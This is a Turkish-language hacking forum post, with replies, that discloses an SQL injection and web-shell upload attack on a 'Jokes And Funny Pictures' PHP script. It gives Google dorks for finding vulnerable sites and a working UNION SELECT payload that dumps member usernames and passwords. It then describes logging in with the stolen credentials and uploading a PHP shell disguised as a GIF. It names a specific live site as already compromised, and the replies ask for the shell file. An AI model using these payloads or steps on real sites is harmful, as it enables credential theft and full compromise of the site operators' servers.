

Jokes And Funny Pictures Script File Upload An Sql İnjectin Exploit
-
Açıcı bulan benim alıntı yapacak olan şerrolar alıntıdır yanına bulan kişidiyde yazsın.
google dork 1: inurl:index.php?sbjoke_id=
google dork 2: inurl:index.php?sbpic_id=
exploit: index.php?sbpic_id=-99+union+select+0,1,2,concat_ws(0x3a,sbuser_name,sbuser_pwd),4,5,6,7,8,9,10+from+sbjks_members/*
evet sadece sql injection ile sonuç alamayız bunun için oradaki username pass ile giriş yapın
giriş yaptıktan sonra : /submitpic.php Sayfasına gelip http://rapidshare.com/files/146837307/modaa.gif.php shell dosyasını upload edin resim olarak gözükücektir upload edilden sonra resme numarara vericekti sistem kendi 7440564modaa.gif.php gibi resmin yüklenicegi klasör /uploadedpics/ klasörüdür binlerce sitede kullanılan bir scriptdir google bakın hadi hayırlı Heykıtlar :P
-
http://www.joke4u.co.uk/index.php?sbjoke_id=98
hemen birileri heyklemiş :)
-
heyk lerler affetmezler :) malw0rm e açık yollamıyorum artık bu açıklar public edilme nedeni tamamen kişisel ayrıca public etmedigim açıklarda var onlarıda zaman içinde paylaşırım.
-
üstadım sizin modaa.gif shell i bize bir yere yollarsanız çok memnun kalırım verdiğiniz link eror diyor süresi bitmiş sanırım..